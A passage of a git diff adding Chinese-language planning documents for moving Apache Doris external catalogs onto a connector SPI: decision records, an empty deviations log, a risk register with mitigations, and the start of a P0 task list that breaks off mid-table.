**背景**:`ConnectorColumnStatistics.minValue / maxValue` 用 `Object` 装载,缺少静态类型检查可能导致 connector 间不一致。 +- **决策**:在 `ConnectorColumnStatistics` javadoc 中列出 `ConnectorType` ↔ Java 装箱类型完整映射表(如 INT→Integer、TIMESTAMP→Instant、BINARY→byte[]);连接器读取不匹配类型时**抛 `IllegalArgumentException`**,由 fe-core 转成 `UserException`。 +- **替代方案**:(a)引入泛型 `ConnectorColumnStatistics`——过于复杂、跨方法签名传染;(b)引入 union 类型——Java 不原生支持。 +- **影响**:仅 javadoc 与运行时检查,无签名变化。 + +--- + +### D-017 — sys-table 命名统一 `$suffix`(原 U5) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[01-spi-extensions-rfc.md §10](./01-spi-extensions-rfc.md) +- **背景**:Iceberg / Paimon 各自有 sys-table(`tbl$snapshots`、`tbl$history` 等)。命名风格 `$xxx` vs `xxx@` vs `[xxx]` 跨方言不一致。 +- **决策**:SPI 层固定 `$suffix` 约定。如未来出现冲突(如某 SQL dialect 把 `$` 视为变量前缀),通过 catalog property `sys_table_separator` 提供别名机制,但**不在本计划范围**。 +- **影响**:所有 sys-table 实现统一遵循。 + +--- + +### D-016 — `getCredentialsForScans` 批量化(原 U4) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[01-spi-extensions-rfc.md §9](./01-spi-extensions-rfc.md) +- **背景**:原设计单 range 调一次 `getCredentialsForScan`,N 个 range 触发 N 次 STS 调用,可能撞限流。 +- **决策**:签名定为 `Map getCredentialsForScans(session, handle, List)`。连接器自由决定 STS 调用粒度(1 次共享 / 按 prefix 分组 / 1:1)。fe-core 一个 scan node 一次调用。 +- **替代方案**:保持单个 + 加内部缓存——把缓存策略推给每个 connector,不一致风险更高。 +- **影响**:替换原 `getCredentialsForScan` 单个签名。调用位置从 `setScanParams` 移到 `createScanRangeLocations`。 + +--- + +### D-015 — `ConnectorTransaction.getTransactionId` 由连接器分配(原 U3) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[01-spi-extensions-rfc.md §7.2](./01-spi-extensions-rfc.md) +- **背景**:transaction ID 是连接器自己分配还是 fe-core 统一分配? +- **决策**:连接器分配。连接器最清楚事务 ID 与外部系统(如 HMS transaction id、Iceberg snapshot id)的对应关系。fe-core 在 `PluginDrivenTransactionManager` 用 `Map` 索引即可。 +- **影响**:`ConnectorTransaction.getTransactionId()` 是 connector-side 字段。 + +--- + +### D-014 — 不新增 `invalidateColumnStatistics`(原 U2) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[01-spi-extensions-rfc.md §6](./01-spi-extensions-rfc.md) +- **背景**:是否给 `ConnectorMetaInvalidator` 加 `invalidateColumnStatistics(...)`? +- **决策**:暂不加。column stats 失效一并挂在 `invalidateTable` 上,避免接口表面膨胀。如后续发现频繁需要单独失效列统计,再加方法(向后兼容 default 即可)。 +- **影响**:`ConnectorMetaInvalidator` 接口保持 5 个方法(catalog / database / table / partition / statistics 整张表)。 + +--- + +### D-013 — `ConnectorProcedureOps.listProcedures` 一次性返回(原 U1) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[01-spi-extensions-rfc.md §5.2](./01-spi-extensions-rfc.md) +- **背景**:connector 暴露的 procedure 列表是初始化时固定还是允许运行时变化? +- **决策**:一次性。Connector 生命周期内稳定;如外部系统的可用 procedure 集合变化,必须重新创建 catalog。 +- **理由**:fe-core 可缓存该列表用于 `SHOW PROCEDURES`、autocompletion;动态变化模型复杂度不值得。 +- **影响**:在 `listProcedures()` 的 javadoc 中明确写出"Lifecycle contract"。 + +--- + +### D-012 — Connector 安装初版强制重启 FE(原 D12) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[00-master-plan.md §5](./00-master-plan.md) +- **背景**:装新 connector 后是否要求重启 FE? +- **决策**:初版强制重启。原因:跨连接器共享类型可能有 classloader 缓存问题,强制重启避免难复现的 corner case。后续版本可考虑热加载。 +- **影响**:文档明确 + 装包流程明确。 + +--- + +### D-011 — `RemoteDorisExternalCatalog` 不在本计划主线(原 D11) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[00-master-plan.md §5](./00-master-plan.md) +- **背景**:Doris-to-Doris federation 是否做成 connector? +- **决策**:长期目标做 connector,但**单独立项**,不在本计划主线(25 周计划中)。 +- **影响**:`RemoteDorisExternalCatalog` 在 P8 不删除;保留独立路径。 + +--- + +### D-010 — `LakeSoulExternalCatalog` 在 P8 删除(原 D10) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[00-master-plan.md §5](./00-master-plan.md) +- **背景**:`CatalogFactory` 已抛 "Lakesoul catalog is no longer supported",但类文件仍在。 +- **决策**:在 P8 收尾时删除剩余 `datasource/lakesoul/` 全部类。 +- **影响**:P8 task 增加 lakesoul 清理项。 + +--- + +### D-009 — API 版本号本计划永不 +1(原 D9) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[00-master-plan.md §5](./00-master-plan.md)、[01-spi-extensions-rfc.md §2.1](./01-spi-extensions-rfc.md) +- **背景**:`ConnectorProvider.apiVersion()` 何时 +1? +- **决策**:本计划范围内(25 周)保持 `apiVersion=1`,只新增 default 方法,不破坏现有签名。 +- **影响**:所有 SPI 扩展必须用 default 方法。如真有不可避免的 breaking change,需走 deviation 流程并升级到 v2。 + +--- + +### D-008 — 生产强制目录式插件(原 D8) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[00-master-plan.md §5](./00-master-plan.md) +- **背景**:是否允许 built-in connector(classpath 中直接打进 FE jar)? +- **决策**:否。built-in 模式只用于测试(ServiceLoader 扫 classpath);生产部署必须从 `connector_plugin_root` 目录加载 plugin zip。 +- **影响**:FE 发行包不含 connector jar;运维流程文档要明确插件部署步骤。 + +--- + +### D-007 — kafka/kinesis/odbc/doris 不在本计划范围(原 D7) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[00-master-plan.md §5](./00-master-plan.md) +- **背景**:`datasource/` 下还有 kafka / kinesis / odbc / doris 子目录,是否一并迁移? +- **决策**:否。流式数据源(kafka/kinesis)与外部 catalog 模型不同;odbc 是 BE-driven;doris 是内部联邦。单独立项。 +- **影响**:P8 不删除这 4 个子目录。 + +--- + +### D-006 — Iceberg snapshot/manifest cache 放连接器内(原 D6) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[00-master-plan.md §5](./00-master-plan.md)、[01-spi-extensions-rfc.md §8](./01-spi-extensions-rfc.md) +- **背景**:Iceberg 的 snapshot cache 和 manifest cache 是 fe-core 通用基础设施还是连接器内部细节? +- **决策**:连接器内部细节。fe-core 不感知。连接器自己管理生命周期、淘汰策略。 +- **替代方案**:放 `fe-core/datasource/metacache/` 通用框架——会增加 fe-core 对 Iceberg 概念的耦合。 +- **影响**:P6 迁移时把 `cache/IcebergManifestCacheLoader` 等整体搬到 `fe-connector-iceberg`。 + +--- + +### D-005 — Hudi / Iceberg-on-HMS DLA 模型方案 A(原 D5) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[00-master-plan.md §3.4](./00-master-plan.md) +- **背景**:HMS 表可能"实际是" Hudi 或 Iceberg。如何在 SPI 层建模? +- **决策**:方案 A — 用 `ConnectorTableSchema.tableFormatType` 字段(值如 `"HIVE"` / `"HUDI"` / `"ICEBERG"`),由 HMS connector 探测后填充;fe-core 据此 dispatch 到对应 `PhysicalXxxScan`。 +- **替代方案**:方案 B — Hudi 作为独立 catalog type,内部委托 HMS——增加 catalog 实例数,用户混淆度高。 +- **影响**:P3 hudi 和 P7 hive 迁移都依赖此模型。 + +--- + +### D-004 — HMS event pipeline 放 fe-connector-hms(原 D4) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[00-master-plan.md §3.8](./00-master-plan.md)、[01-spi-extensions-rfc.md §6](./01-spi-extensions-rfc.md) +- **背景**:21 个 HMS event 类放 fe-core 还是 fe-connector-hms? +- **决策**:fe-connector-hms。通过新 SPI 接口 `ConnectorMetaInvalidator`(在 `ConnectorContext` 暴露)回调 fe-core 的 `ExternalMetaCacheMgr`。 +- **替代方案**:只把"轮询 HMS 拿事件流"放 connector,"解析事件 + 分发失效"留 fe-core——分散,不利于演化。 +- **影响**:P7.2 完整迁移 21 个类 + `MetastoreEventsProcessor`。`HiveConnector.create(...)` 启动 listener 线程;`close()` 停止。 + +--- + +### D-003 — 旧 `*ExternalCatalog` 子类全部删除(原 D3) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[00-master-plan.md §5](./00-master-plan.md) +- **背景**:迁移过程中是保留旧 `IcebergExternalCatalog` 等类作为"中间形态"还是彻底删除? +- **决策**:全部删除。中间形态会让代码长期处于"两套并存"状态,维护负担、bug 风险都更大。 +- **替代方案**:保留一段"deprecated 但可用"期——拒绝,因为旧实现实质上不会被维护。 +- **影响**:P8 强制删除所有 `*ExternalCatalog` / `*ExternalDatabase` / `*ExternalTable` 类;前置工作是 P2-P7 把所有反向 `instanceof` 改为通用接口调用。 + +--- + +### D-002 — `PluginDrivenScanNode` 长期保持 extends `FileQueryScanNode`(原 D2) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[00-master-plan.md §5](./00-master-plan.md) +- **背景**:`PluginDrivenScanNode` 当前继承 `FileQueryScanNode`,但 JDBC / ES 本质不是文件扫描,用 `FORMAT_JNI` 兜底。是否要重构为更彻底的多态? +- **决策**:长期保持当前继承结构。JDBC / ES 的 `FORMAT_JNI` 兜底已被 ES/JDBC 验证可行。重构成本高、收益不明确。 +- **影响**:所有 plugin-driven connector 走同一 scan-node 子类,简化 dispatch 逻辑。 + +--- + +### D-001 — 沿用 `SUPPORTS_PASSTHROUGH_QUERY`(原 D1) + +- **日期**:2026-05-24 +- **状态**:✅ 生效 +- **关联**:[00-master-plan.md §5](./00-master-plan.md) +- **背景**:是否要为 SQL 透传以外的远程 query 类型(如 `query()` TVF)新增 SPI? +- **决策**:不新增。已有 `ConnectorCapability.SUPPORTS_PASSTHROUGH_QUERY` + `ConnectorTableOps.getColumnsFromQuery` 覆盖了主要场景,沿用。 +- **影响**:无新增 API。 + +--- + +## 附录:决策模板 + +新增决策时复制以下模板到顶部(在 §详细记录 下方),并更新 §📋 索引表。 + +```markdown +### D-NNN — <一句话主题> + +- **日期**:YYYY-MM-DD +- **状态**:✅ 生效 / 🟡 待评审 / ❌ 已废止(被 D-MMM 取代) +- **关联**:[文档章节链接]、[相关 task ID] +- **背景**:为什么需要做这个决策?触发场景是什么? +- **决策**:具体决定是什么? +- **替代方案**:考虑过哪些其他方案?为什么没选? +- **影响**:哪些代码 / 文档 / 流程会受影响?是否需要后续 follow-up? +``` diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md new file mode 100644 index 00000000000000..cbb49e7d5faabc --- /dev/null +++ b/plan-doc/deviations-log.md @@ -0,0 +1,74 @@ +# 设计偏差日志 + +> **Append-only**:实施中发现原计划/RFC 设计**不可行 / 不必要 / 需要重新设计**时记入本文件。 +> 与"决策"的区别见 [README §3.1](./README.md): +> - 决策(D-NNN)= **事前**确定的选择 +> - 偏差(DV-NNN)= **事后**对原计划的修正 +> +> 编号规则:`DV-NNN` 三位数字,从 001 起单调递增,永不复用。 +> +> 维护规则见 [README §4.3](./README.md):**先记偏差再改文档**,不要 silent edit。 + +--- + +## 📋 索引 + +> 时间倒序;当前共 **0** 项。 + +| 编号 | 偏差主题 | 原计划位置 | 日期 | 当前状态 | +|---|---|---|---|---| +| _(尚无偏差)_ | | | | | + +--- + +## 详细记录(时间倒序) + +_(尚无条目)_ + +--- + +## 附录:偏差模板 + +发现偏差时复制以下模板到 §详细记录 顶部,并更新 §📋 索引表。 + +```markdown +### DV-NNN — <一句话主题> + +- **发现日期**:YYYY-MM-DD +- **发现 session / agent**:(哪次 session 发现的) +- **当前状态**:🟢 已修正 / 🟡 待修正 / 🔴 阻塞中 +- **原计划位置**:[文档名 §章节](./xxx.md),引用原句或代码片段 +- **偏差描述**:原计划说 X,实施中发现 Y +- **触发场景**:什么操作 / 什么连接器 / 什么 corner case 引发的 +- **新方案**:现在的处理方式 +- **替代方案**:考虑过的其他修正 +- **影响范围**: + - 文档:哪些文件需要同步修改(已修改的标 ✅) + - 代码:哪些已合 PR / 待提 PR + - 计划:是否影响阶段时长 / 顺序 +- **关联**:[task ID]、[PR #]、[decision D-NNN(如果偏差催生了新决策)] +- **后续动作**: + - [ ] 同步修改文档 X + - [ ] 提 PR 调整代码 Y + - [ ] 通知相关 task owner +``` + +--- + +## 何时应该写偏差日志(典型场景) + +1. RFC 中某 SPI 方法签名在实际实现时发现参数不够 / 太多 +2. 原计划某阶段时长估算严重偏差(如 2 周变 4 周) +3. 实施中发现某连接器有未预料的特殊性(如 Iceberg 某 catalog flavor 不支持某操作) +4. 原计划的某 task 拆分粒度太粗 / 太细,重新拆分 +5. 原计划假设某个三方库行为 X,实际是 Y +6. 决策(D-NNN)在落地时发现执行不了,需要重新评估 +7. 跨连接器假设的一致性被打破(如某 SPI 默认行为对 connector A 合理但对 B 不合理) + +## 何时**不**应该写偏差日志 + +- 普通 bug 修复(写 commit message) +- task 的子步骤微调(在 task 文件里加备注) +- 文档错别字 / 链接错误(直接改) +- 命名重构 / 重命名(直接改) +- 已知的实施细节决策(如选用 `HashMap` vs `LinkedHashMap`) diff --git a/plan-doc/risks.md b/plan-doc/risks.md new file mode 100644 index 00000000000000..98ac419a8465ce --- /dev/null +++ b/plan-doc/risks.md @@ -0,0 +1,306 @@ +# 风险登记册 + +> **滚动状态**:与 decisions / deviations 不同,本文件中**每个风险条目允许更新状态**(监控中 → 缓解中 → 已闭环 / 已触发)。 +> 编号规则:`R-NNN` 三位数字。原 master plan §6 的 R1-R8 + RFC §16.1 的 Q1-Q6 已迁入映射到 R-001..R-014。 +> 维护规则见 [README §4.4](./README.md):每周一例行扫一遍。 +> +> 模板见文末 §附录。 + +--- + +## 📋 风险矩阵 + +> 横轴 = 概率,纵轴 = 影响。颜色:🔴 必须缓解 / 🟠 应该缓解 / 🟡 监控 / ⚪ 可接受 + +| | **概率:低** | **概率:中** | **概率:高** | +|---|---|---|---| +| **影响:High** | 🟠 R-006 | 🔴 R-001 | 🔴 R-002 | +| **影响:Med** | 🟡 R-007、R-011 | 🟠 R-004、R-005 | 🟠 R-003、R-009、R-010、R-012 | +| **影响:Low** | ⚪ — | 🟡 R-008、R-013、R-014 | 🟡 — | + +--- + +## 📋 索引(当前 active) + +| 编号 | 别名 | 风险 | 影响 | 概率 | 状态 | Owner | 触发阶段 | +|---|---|---|---|---|---|---|---| +| R-001 | R1 | Image 反序列化兼容回归 | High | 中 | 🟢 监控中 | @me | P2-P7 每个迁移 | +| R-002 | R2 | Hive ACID 写路径数据不一致 | High | 高 | 🟡 待启动 | TBD | P7.3 | +| R-003 | R3 | Iceberg Procedure SPI 抽象失败 | Med | 高 | 🟢 监控中 | @me | P6.4 | +| R-004 | R4 | classloader 隔离打破 SDK 单例 | Med | 中 | 🟢 监控中 | @me | P5/P6 | +| R-005 | R5 | nereids 写命令对外部表深度耦合 | Med | 中 | 🟡 待 P6.3 评估 | TBD | P6.3 | +| R-006 | R6 | 通过 SPI 性能回归 | Low | 低 | ⏸ 未启动 | TBD | P0 末 benchmark | +| R-007 | R7 | FE/BE 共享 jar 冲突 | Low | 低 | ⏸ 未启动 | TBD | P5/P6 | +| R-008 | R8 | 文档与流程脱节 | Low | 中 | 🟢 缓解中 | @me | 全周期 | +| R-009 | Q1 | `ConnectorProcedureSpec.arguments` 类型不安全 | Med | 中 | 🟢 监控中 | @me | P6.4 | +| R-010 | Q2 | `ConnectorMetaInvalidator` 异常路径 leak listener thread | Med | 中 | 🟢 监控中 | @me | P7.2 | +| R-011 | Q3 | `ConnectorTransaction.commit` 跨 BE 分片复杂性 | Med | 低 | 🟢 监控中 | @me | P5-P7 | +| R-012 | Q4 | `ConnectorMvccSnapshot.snapshotId` long 不适配 string-id 系统 | Med | 中 | 🟢 监控中 | @me | P5/P6(未来) | +| R-013 | Q5 | `ConnectorPartitionField.transform` 字符串约定漂移 | Low | 中 | 🟢 监控中 | @me | P5/P6/P7 | +| R-014 | Q6 | E9 的 thrift sink 选择与 connector 演化脱节 | Low | 中 | 🟢 监控中 | @me | P6.3 | + +--- + +## 详细记录 + +### R-001 (R1) — Image 反序列化兼容回归 + +- **首次提出**:2026-05-24(master plan §6) +- **影响**:High — 用户从旧 FE 升级时 catalog 元数据丢失,最坏情况无法启动 +- **概率**:中 — 每个连接器迁移都需要处理,工作量大 +- **当前状态**:🟢 监控中 +- **缓解措施**: + 1. 每个连接器迁移加 image 兼容测试(regression-test 中新增 `_migration_compat` 套件) + 2. `PluginDrivenExternalCatalog.gsonPostProcess` 中保留 logType 迁移分支至少 2 个大版本 + 3. `ExternalCatalog.registerCompatibleSubtype` 注册每个旧子类的 GSON 兼容映射 +- **拥有者**:@me +- **关联 task**:所有 P2-P7 迁移 task +- **更新日志**: + - 2026-05-24:初始登记;ES/JDBC 已用此模式验证可行 + +--- + +### R-002 (R2) — Hive ACID 写路径数据不一致 + +- **首次提出**:2026-05-24(master plan §6) +- **影响**:High — 数据正确性问题,最严重的失败模式 +- **概率**:高 — `HMSTransaction` 1866 行复杂逻辑、重构难度大 +- **当前状态**:🟡 待启动(P7.3 才相关) +- **缓解措施**: + 1. P7.3 启动前必建独立 ACID test suite(覆盖 INSERT OVERWRITE PARTITION、UPDATE、DELETE、MERGE 各 corner case) + 2. 用旧实现产生 baseline 数据 → 新实现 bit-for-bit 比对 + 3. 增加 chaos test(commit 中途杀 FE / 杀 BE) +- **拥有者**:TBD(P7 启动前指派) +- **关联 task**:P7.3 +- **更新日志**: + - 2026-05-24:初始登记 + +--- + +### R-003 (R3) — Iceberg Procedure SPI 抽象失败 + +- **首次提出**:2026-05-24(master plan §6) +- **影响**:Med — 10 个 action 用不了,但用户可绕过用 Trino/Spark 调用 +- **概率**:高 — Action 行为多样,统一抽象有挑战 +- **当前状态**:🟢 监控中 +- **缓解措施**: + 1. 已参考 Trino Iceberg connector 的 Procedure SPI 设计(RFC §5) + 2. P6.4 启动前先实现 2 个最简单的(`expire_snapshots`、`rollback_to_snapshot`)验证抽象 + 3. 若发现抽象不行,按 deviation 流程调整 SPI +- **拥有者**:@me +- **关联 task**:P6.4 +- **更新日志**: + - 2026-05-24:初始登记;RFC §5 已设计 `ConnectorProcedureOps` 草案 + +--- + +### R-004 (R4) — classloader 隔离打破 SDK 单例 + +- **首次提出**:2026-05-24(master plan §6) +- **影响**:Med — Iceberg/Paimon/Trino SDK 加载错误,连接器初始化失败 +- **概率**:中 — 已有 ES/JDBC 验证基础可行性,但复杂 SDK 未试 +- **当前状态**:🟢 监控中 +- **缓解措施**: + 1. `ConnectorPluginManager.CONNECTOR_PARENT_FIRST_PREFIXES` 已含 `org.apache.doris.connector.` 和 `org.apache.doris.filesystem.` + 2. 每个连接器加入 SPI 路径时确认 parent-first 列表覆盖所有共享 SDK 接口 + 3. P5/P6 跑集成测试验证多 catalog 实例共存 +- **拥有者**:@me +- **关联 task**:P5、P6 +- **更新日志**: + - 2026-05-24:初始登记 + +--- + +### R-005 (R5) — nereids 写命令对外部表深度耦合 + +- **首次提出**:2026-05-24(master plan §6) +- **影响**:Med — Iceberg DML 命令(DELETE/MERGE/UPDATE)改造工作量难估 +- **概率**:中 — `IcebergUpdateCommand` 等 305-行级别复杂逻辑 +- **当前状态**:🟡 待 P6.3 评估 +- **缓解措施**: + 1. P6.3 之前必须单独写 `plan-doc/06-iceberg-write-path-rfc.md` 评估方案 + 2. 给 `ConnectorMetadata` 暴露 hint API(如 `getMergeMode()`)让 nereids 命令通过 SPI 查询 +- **拥有者**:TBD(P6 启动前指派) +- **关联 task**:P6.3 +- **更新日志**: + - 2026-05-24:初始登记 + +--- + +### R-006 (R6) — 通过 SPI 性能回归 + +- **首次提出**:2026-05-24(master plan §6) +- **影响**:Low — < 5% 损失可接受 +- **概率**:低 — 反射开销小、SPI 抽象层很薄 +- **当前状态**:⏸ 未启动 +- **缓解措施**: + 1. P0 末新增 benchmark:1k 个 catalog × `listTableNames` / `getSchema` 路径 + 2. 接受 < 5% 性能损失 +- **拥有者**:TBD +- **关联 task**:P0-T(待加) +- **更新日志**: + - 2026-05-24:初始登记 + +--- + +### R-007 (R7) — FE/BE 共享 jar 冲突 + +- **首次提出**:2026-05-24(master plan §6) +- **影响**:Low — 影响特定部署 +- **概率**:低 +- **当前状态**:⏸ 未启动 +- **缓解措施**: + 1. `plugin-zip.xml` 的 exclude 列表必须包含 BE 侧 jar + 2. 每个连接器打包后用 `unzip -l plugin.zip` 人工 review +- **拥有者**:TBD +- **关联 task**:每个 Pn 的打包子任务 +- **更新日志**: + - 2026-05-24:初始登记 + +--- + +### R-008 (R8) — 文档与流程脱节 + +- **首次提出**:2026-05-24(master plan §6) +- **影响**:Low — 单次延误;长期累积可能误导 +- **概率**:中 — 文档维护人皆有惰性 +- **当前状态**:🟢 缓解中 +- **缓解措施**: + 1. 建立本跟踪机制(README / PROGRESS / 各 log / tasks / connectors) + 2. AGENT-PLAYBOOK §5 强制纪律 + 3. 后续可加 `tools/check-tracking-freshness.sh` 自动检测过期 +- **拥有者**:@me +- **关联 task**:跨周期 +- **更新日志**: + - 2026-05-24:跟踪机制建立后状态从 🟡 变 🟢 + +--- + +### R-009 (Q1) — `ConnectorProcedureSpec.arguments` 类型不安全 + +- **首次提出**:2026-05-24(RFC §16.1) +- **影响**:Med — 运行时类型错误,但 fail-fast 可接受 +- **概率**:中 — connector 实现者可能用错类型 +- **当前状态**:🟢 监控中 +- **缓解措施**: + 1. 限定允许的类型:`String / Long / Double / Boolean / Instant / List / Map` + 2. `ConnectorProcedureSpec` 构造时校验 + 3. 用 `IllegalArgumentException` 兜底(同 D-018 模式) +- **拥有者**:@me +- **关联 task**:P0-T(procedure SPI 实现时) +- **更新日志**: + - 2026-05-24:初始登记 + +--- + +### R-010 (Q2) — `ConnectorMetaInvalidator` 异常路径 leak listener thread + +- **首次提出**:2026-05-24(RFC §16.1) +- **影响**:Med — FD 泄漏 / 线程泄漏 / OOM +- **概率**:中 — 异常处理代码容易写漏 +- **当前状态**:🟢 监控中 +- **缓解措施**: + 1. `Connector.close()` 中必须明确停止 listener thread + 2. 加 fe-core 侧 daemon 监控:catalog 已 unregister 但 listener 线程还在 → 告警 +- **拥有者**:@me +- **关联 task**:P7.2 +- **更新日志**: + - 2026-05-24:初始登记 + +--- + +### R-011 (Q3) — `ConnectorTransaction.commit` 跨 BE 分片复杂性 + +- **首次提出**:2026-05-24(RFC §16.1) +- **影响**:Med — 写路径事务一致性 +- **概率**:低 — 已有 `ConnectorWriteOps.finishInsert(handle, fragments)` 覆盖 +- **当前状态**:🟢 监控中(设计已避开此风险) +- **缓解措施**: + 1. `beginTransaction` 只负责开/关,**不负责 commit 数据** + 2. 数据 commit 通过现有 `finishInsert/finishDelete/finishMerge(handle, fragments)` + 3. 在 RFC §7.6 说明此分工 +- **拥有者**:@me +- **关联 task**:P0(SPI 设计)已规避,P5-P7(实施)需复核 +- **更新日志**: + - 2026-05-24:初始登记 + +--- + +### R-012 (Q4) — `ConnectorMvccSnapshot.snapshotId` long 不适配 string-id 系统 + +- **首次提出**:2026-05-24(RFC §16.1) +- **影响**:Med — Delta Lake 等未来连接器无法表达 +- **概率**:中 — 长期看一定会遇到 +- **当前状态**:🟢 监控中(接受 v1 用 long) +- **缓解措施**: + 1. v1 用 long + 2. 未来需要时加 `String getSnapshotIdAsString()` default 方法(向后兼容) +- **拥有者**:@me +- **关联 task**:本计划范围内不处理 +- **更新日志**: + - 2026-05-24:初始登记 + +--- + +### R-013 (Q5) — `ConnectorPartitionField.transform` 字符串约定漂移 + +- **首次提出**:2026-05-24(RFC §16.1) +- **影响**:Low — connector 间不互认,但用户视角隔离 +- **概率**:中 — 文档约束 vs 工程纪律 +- **当前状态**:🟢 监控中 +- **缓解措施**: + 1. RFC §19 附录 B 列出全部允许的 transform 字符串 + 2. `ConnectorPartitionSpec` 构造时校验 + 3. 未列出的字符串视为 `CUSTOM`,由 connector 内部识别 +- **拥有者**:@me +- **关联 task**:P5-P7 +- **更新日志**: + - 2026-05-24:初始登记 + +--- + +### R-014 (Q6) — E9 的 thrift sink 选择与 connector 演化脱节 + +- **首次提出**:2026-05-24(RFC §16.1) +- **影响**:Low — 新 sink 类型需要 fe-core 与 connector 协同改动 +- **概率**:低 — 现有 4 类 sink 覆盖大部分场景 +- **当前状态**:🟢 监控中 +- **缓解措施**: + 1. `ConnectorWriteConfig.properties` 留 `"thrift_sink_type"` 自定义字段 + 2. `CUSTOM` ConnectorWriteType 走 generic sink 兜底 + 3. 文档说明扩展机制 +- **拥有者**:@me +- **关联 task**:P6.3 +- **更新日志**: + - 2026-05-24:初始登记 + +--- + +## 附录:风险模板 + +新增风险时复制以下模板到 §详细记录 末尾,并更新 §📋 索引和 §📋 风险矩阵。 + +```markdown +### R-NNN — <一句话主题> + +- **首次提出**:YYYY-MM-DD(来源文档) +- **影响**:High / Med / Low +- **概率**:高 / 中 / 低 +- **当前状态**:🟢 监控中 / 🟡 待启动 / 🟠 缓解中 / 🔴 已触发 / ✅ 已闭环 / ⏸ 未启动 +- **缓解措施**: + 1. ... +- **拥有者**:@me / TBD +- **关联 task**:... +- **更新日志**: + - YYYY-MM-DD:状态变化描述 +``` + +## 状态流转图 + +``` +[新增] ──→ 🟡 待启动 ──→ 🟢 监控中 ──→ 🟠 缓解中 ──→ ✅ 已闭环 + ↓ + 🔴 已触发 ──→ 事故响应 + 改 mitigation +``` + +⏸ 未启动 = 该风险触发条件还很远(如 P6 的风险在 P0 阶段),可以晚一些指派 owner。 diff --git a/plan-doc/tasks/P0-spi-foundation.md b/plan-doc/tasks/P0-spi-foundation.md new file mode 100644 index 00000000000000..4ecf529c411609 --- /dev/null +++ b/plan-doc/tasks/P0-spi-foundation.md @@ -0,0 +1,129 @@ +# P0 — SPI 缺口补齐 + +> 阶段总览见 [00-master-plan §3.1](../00-connector-migration-master-plan.md)。 +> SPI 详细设计见 [01-spi-extensions-rfc.md](../01-spi-extensions-rfc.md)。 +> 协作规范见 [AGENT-PLAYBOOK.md](../AGENT-PLAYBOOK.md)。 + +--- + +## 元信息 + +- **状态**:🚧 进行中 +- **启动日期**:2026-05-24 +- **目标完成**:2026-06-07(2 周) +- **实际完成**:— +- **阻塞**:无(项目第一个阶段) +- **阻塞下游**:P1 (scan-node 收口)、P3–P7(所有连接器迁移依赖本阶段 SPI baseline) +- **主 owner**:@me + +--- + +## 阶段目标 + +完成 [RFC §2.1 表](../01-spi-extensions-rfc.md) 中全部 10 项 SPI 缺口的接口 / 类型定义 + 默认行为 + fe-core 侧 converter,保证 JDBC 和 ES 现有实现零修改通过。 + +具体分两批: +- **批 0**(W0 D3-5):E3 MetaInvalidator、E4 Transaction、E5 MvccSnapshot —— 后续所有连接器实现 ConnectorMetadata 时的 baseline。 +- **批 1**(W1):E1 CreateTableRequest、E10 listPartitions —— 阻塞 P3 hudi、P5 paimon。 +- **批 2-4** 在对应 P 阶段开始时随主任务做(不在 P0 范围内)。 + +--- + +## 验收标准 + +从 [RFC §17 验收清单](../01-spi-extensions-rfc.md) 同步: + +- [ ] `mvn -pl fe-connector verify` 全绿,新增类型 / 方法全部就位 +- [ ] `fe-connector-spi` 仅新增 `ConnectorMetaInvalidator` 接口与 `ConnectorContext.getMetaInvalidator()` 默认方法 +- [ ] fe-core 侧 converter 就位:`CreateTableInfoToConnectorRequestConverter`、`ExternalMetaCacheInvalidator`、`ConnectorMvccSnapshotAdapter` +- [ ] `PluginDrivenTransactionManager` 通用化(不再依赖任何具体连接器) +- [ ] JDBC、ES 现有 regression-test 全绿 +- [ ] `FakeConnectorPlugin` 覆盖所有新增 default 行为路径 +- [ ] `tools/check-connector-imports.sh` 接入 maven enforcer +- [x] 本阶段关闭未决问题 U1-U6(2026-05-24 完成,决策 D-013..D-018) +- [ ] master plan §3.1 全部任务勾选 + +--- + +## 任务清单 + +### 批 0:基础三件套(W0 D3-5,2026-05-27 → 2026-05-29) + +| ID | 任务 | 设计参考 | Owner | 状态 | PR | 启动 | 完成 | 备注 | +|---|---|---|---|---|---|---|---|---| +| P0-T01 | RFC §16.2 决策点闭环(U1-U6) | RFC §16 | @me | ✅ | n/a | 2026-05-24 | 2026-05-24 | D-013..D-018 | +| P0-T02 | 项目跟踪机制建立 | README/PROGRESS/...| @me | 🚧 | n/a | 2026-05-24 | — | 本文件等 | +| P0-T03 | E3:`ConnectorMetaInvalidator` 接口(fe-connector-spi)| RFC §6.2 | — | ⏳ | — | — | — | 5 个 invalidate 方法 | +| P0-T04 | E3:`ConnectorContext.getMetaInvalidator()` default | RFC §6.3 | — | ⏳ | — | — | — | spi 包 | +| P0-T05 | E4:`ConnectorTransaction` 继承 `ConnectorTransactionHandle` | RFC §7.2 | — | ⏳ | — | — | — | 替换占位 | +| P0-T06 | E4:`ConnectorWriteOps.beginTransaction` default | RFC §7.3 | — | ⏳ | — | — | — | | +| P0-T07 | E4:`ConnectorSession.getCurrentTransaction` default | RFC §7.6 | — | ⏳ | — | — | — | optional | +| P0-T08 | E5:`ConnectorMvccSnapshot` 类型 + 3 个 default 方法 | RFC §8.2-8.3 | — | ⏳ | — | — | — | mvcc 包 | + +### 批 0:fe-core 桥接(W0 D5 - W1 D1) + +| ID | 任务 | 设计参考 | Owner | 状态 | PR | 启动 | 完成 | 备注 | +|---|---|---|---|---|---|---|---|---| +| P0-T09 | 